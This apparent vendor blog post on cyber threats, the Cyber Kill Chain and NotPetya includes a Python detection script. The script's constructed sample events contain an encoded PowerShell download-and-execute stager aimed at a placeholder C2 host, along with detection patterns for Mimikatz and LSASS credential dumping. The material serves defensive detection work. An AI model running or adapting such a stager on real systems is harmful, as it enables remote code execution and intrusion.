The trend for digital systems replacing older technology is far from new. When newspapers moved from a traditional, labour-intensive approach in which typesetters had a job for life to computer-aided production, we would probably have called it "replacing with new technology". What is significant about the current wave of "digital transformation", as we now term it, is the rate at which it is sweeping through many industries, both in its effect on the companies involved and in the way it exposes them to threats and vulnerabilities in today's Internet-connected world.
Reports now suggest that 65% of organisations are checking and reporting on their compliance with industry and security regulations, and that 15% of CISOs (Chief Information Security Officers) and CEOs now feel the need to allocate 10% of their overall IT spend to SecOps (Security Operations).
Source: https://www.hackmageddon.com/category/security/cyber-attacks-statistics/
The threat is clear
Cyber crime typically accounts for over 80% of the attacks recorded in the monthly statistics, with cyber espionage at around 15%; cyber warfare and hacktivism usually account for only 1-2%. Stories of cyber-criminal gangs retiring from active hacking having made billions of dollars from the pursuit are now fairly common: a sobering thought for any company whose financial data is open to extortion by ransomware, or whose IP (Intellectual Property) is open to exfiltration and sale on the Dark Web.
Even PII (Personally Identifiable Information) or simple lists of user credentials (i.e. username and password) are all too attractive to the cyber criminal, and leaving them unguarded on the Internet, perhaps alongside PCI (Payment Card Industry) data, is tantamount to leaving your wallet visible in your car. Staying with the media industry, Netflix, which started as a DVD rental company and went through a digital transformation to become possibly the premier movie and TV streaming service, has been the public face of email phishing campaigns in which attackers impersonating the company harvested subscribers' passwords simply to use the paid service in place of its real owners. The monetary value of each account is low, but the loss of reputation is not to be ignored.
The cloud provides greater flexibility with greater exposure
As well as digital transformation, the inexorable move to the cloud, which now sees over 80% of enterprise network traffic going off-premises, has exposed key company assets and sensitive data to a much greater extent. The idea of a security perimeter marshalled by firewalls and traditional anti-virus techniques is no longer really valid: the perimeter, or "attack surface" as it is described from the hacker's perspective, is now effectively global, with cloud storage located wherever the cloud providers decide to put it.
Not only is the area open to cyber attack widening, but the sophistication of the attacks is increasing, with polymorphic malware evading signature detection and crafted, staged attacks using email or social media phishing to capture user credentials. Phished credentials are saved and used at a later date. Once inside, the attacker works with whatever rights the compromised account already holds, escalates to local administrator where needed, and runs tooling such as Mimikatz (often through PowerShell) to read further credentials from memory, then moves laterally inside the network, from endpoints to the supposedly secure hosts that hold the company's "crown jewels".
The arms race
This evolution of the threat landscape is a kind of "arms race" between hackers trying to gain access and enterprises defending their assets and reputation. It really started in the early days of Windows computing with host-based AV (Anti-Virus), moved on to IDS/IPS (Intrusion Detection Systems / Intrusion Prevention Systems) at the network perimeter, and now demands newer, more intelligent ways to defend against the kind of APTs (Advanced Persistent Threats) that are prevalent today.
Attack and countermeasures
Lockheed Martin, the US aerospace and defence company, adapted the military term "kill chain", which describes the acquisition and destruction of a target, to describe the stages of a cyber attack and the countermeasures available at each. Their Cyber Kill Chain has seven stages: Reconnaissance (the attacker selects the target and identifies its vulnerabilities), Weaponization (the attacker pairs an exploit for those vulnerabilities with a backdoor to build a deliverable payload), Delivery (the attacker sends the payload to the target, for example by email, web or USB), Exploitation (the attacker's code triggers on the target), Installation (the payload installs a "backdoor" giving reusable access), Command and Control (the backdoor calls out to attacker infrastructure, giving "hands on the keyboard" access), and Actions on Objective (the attacker achieves their goals, such as data exfiltration, data destruction, or encryption for ransom). Detecting or blocking at any stage breaks the chain, which is why detection should not be concentrated on delivery alone.
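The attack pattern described above (an Office document spawning PowerShell, an encoded download stager, Run-key persistence, LSASS memory access by Mimikatz-style tooling, then a network logon from the compromised workstation) can be turned into detection logic that tags each event with the kill chain stage it evidences. The following is an added example, not code from this page or from any of the vendors it names; the event shape, field names, allow-list and every sample event are constructed for illustration, loosely modelled on Sysmon process, ProcessAccess, registry and Windows logon records. Credential theft and lateral movement have no stage of their own in the Lockheed Martin chain, so they are filed under Actions on Objective.

```python
"""Map constructed endpoint telemetry onto Cyber Kill Chain stages.

Added example, not code from the page or from any vendor it names. Event
records use a hypothetical, simplified Sysmon-like shape; every field name,
the allow-list and all sample events below are constructed for illustration.
"""
import base64
import re
from dataclasses import dataclass

OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
LSASS_ALLOW = {"MsMpEng.exe", "csrss.exe", "wininit.exe"}   # hypothetical allow-list
PROCESS_VM_READ = 0x0010        # Win32 access right needed to read LSASS memory
ENC_CMD = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)
MIMIKATZ_ARGS = re.compile(r"sekurlsa::|lsadump::|privilege::debug", re.I)

@dataclass(frozen=True)
class Finding:
    stage: str      # kill-chain stage the event evidences
    rule: str
    host: str
    detail: str

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]

def decode_encoded_command(cmdline: str):
    """Plaintext of a PowerShell -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):    # binascii.Error is a ValueError
        return None

def classify(ev: dict) -> list:
    """Per-event rules; credential theft lands under Actions on Objective."""
    hits, host = [], ev["host"]
    if ev["type"] == "process":
        parent, image, cmd = basename(ev.get("parent", "")), basename(ev["image"]), ev.get("cmdline", "")
        if parent.upper() in OFFICE_APPS and image.lower() in SCRIPT_HOSTS:
            hits.append(Finding("Exploitation", "office_spawns_script_host", host, f"{parent} -> {image}"))
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            # A decoded stager that fetches from a URL is the C2 channel being established.
            stage = "Command and Control" if re.search(r"https?://", decoded) else "Exploitation"
            hits.append(Finding(stage, "encoded_powershell", host, decoded))
        if image.lower() == "mimikatz.exe" or MIMIKATZ_ARGS.search(cmd):
            hits.append(Finding("Actions on Objective", "mimikatz_cmdline", host, cmd))
    elif ev["type"] == "process_access":
        if (basename(ev["target"]).lower() == "lsass.exe" and ev["access"] & PROCESS_VM_READ
                and basename(ev["source"]) not in LSASS_ALLOW):
            hits.append(Finding("Actions on Objective", "lsass_memory_read", host, basename(ev["source"])))
    elif ev["type"] == "registry" and RUN_KEY.search(ev["key"]):
        hits.append(Finding("Installation", "run_key_persistence", host, ev["key"]))
    return hits

def run(events: list) -> list:
    """Apply the per-event rules, then correlate across hosts: a network (type 3)
    logon originating from a host where LSASS was read is flagged as lateral movement."""
    findings = [f for ev in events for f in classify(ev)]
    dumped_hosts = {f.host for f in findings if f.rule == "lsass_memory_read"}
    for ev in events:
        if ev["type"] == "logon" and ev["logon_type"] == 3 and ev["source_host"] in dumped_hosts:
            findings.append(Finding("Actions on Objective", "lateral_movement_after_dump",
                                    ev["host"], f"{ev['user']} from {ev['source_host']}"))
    return findings

# Constructed sample: the page's pattern on workstation WS01, then a hop to file server FS01.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"
_ENC = base64.b64encode(_STAGER.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS01", "parent": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"type": "registry", "host": "WS01", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
    {"type": "process_access", "host": "WS01", "source": "C:\\Users\\alice\\AppData\\Local\\Temp\\svc.exe",
     "target": "C:\\Windows\\System32\\lsass.exe", "access": 0x1010},
    {"type": "process_access", "host": "WS01", "source": "C:\\Program Files\\Windows Defender\\MsMpEng.exe",
     "target": "C:\\Windows\\System32\\lsass.exe", "access": 0x1010},   # benign, allow-listed
    {"type": "logon", "host": "FS01", "user": "CORP\\alice", "logon_type": 3, "source_host": "WS01"},
    {"type": "logon", "host": "FS01", "user": "CORP\\bob", "logon_type": 3, "source_host": "WS07"},   # normal
]

if __name__ == "__main__":
    for f in run(SAMPLE_EVENTS):
        print(f"{f.stage:22} {f.rule:28} {f.host:5} {f.detail[:70]}")
```

Run against the constructed sample, this produces five findings: the Office-to-PowerShell parent/child pair, the decoded stager (classed as Command and Control because it fetches from a URL), the Run-key persistence, the LSASS read by the unknown binary, and the type 3 logon to FS01 from the host where that read happened. The Defender process reading LSASS and the unrelated logon from WS07 are not flagged. In production the allow-list would be built from baseline data and the logon correlation would also compare the account to the one seen on the dumping host.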
Today's APTs usually follow this kind of pattern. In 2017 Maersk, the container shipping and logistics company, was infamously hit by NotPetya. It reportedly managed to contain the spread of the malware but warned that the attack would cost up to $300 million and require the rebuilding and reinstallation of thousands of machines. Interestingly, and perhaps ominously, NotPetya was an adaptation and combination of earlier pieces of malware: it reused the disk-encrypting code of the Petya ransomware, but its "encryption" was effectively unrecoverable, which makes it a wiper dressed up as ransomware. It spread using EternalBlue, an exploit developed by the US National Security Agency and leaked by the Shadow Brokers, which targets the MS17-010 vulnerability in Microsoft's SMB (Server Message Block) protocol; where SMB was already patched it fell back to credentials harvested from memory with a Mimikatz-derived tool, executed remotely via PsExec and WMI. Its initial entry point was a trojanised update of the Ukrainian accounting package M.E.Doc, which is why Ukrainian banks, media and energy companies were hit first before it spread worldwide. The practical lesson is that patching SMB alone would not have stopped it: credential hygiene and detection of lateral movement were needed as well.
So what should your SecOps toolset look like?
In today's hostile and digitally transformed environment, advanced threat protection is needed for both endpoints and cloud access, and this protection must be able to detect and respond to attacks at every stage of the cyber kill chain, with a coordinated SecOps (Security Operations) approach providing incident and event management and even automated response. At activereach we have identified key partners with advanced capabilities in the emerging cyber security product areas of EDR (Endpoint Detection and Response), CASB (Cloud Access Security Broker) and SOAR (Security Orchestration, Automation and Response).
CrowdStrike's Falcon EDR platform combines machine learning with cloud delivery to provide complete endpoint protection via a single low-resource, lightweight agent.
Netskope hold patents for CASB technology and have a unique capability to parse cloud traffic for API and JSON data, enabling full protection against advanced threats and data leakage.
Swimlane simplify the task of integrating multiple SecOps products by using an API-centric drag and drop playbook approach to provide leading SOAR capabilities.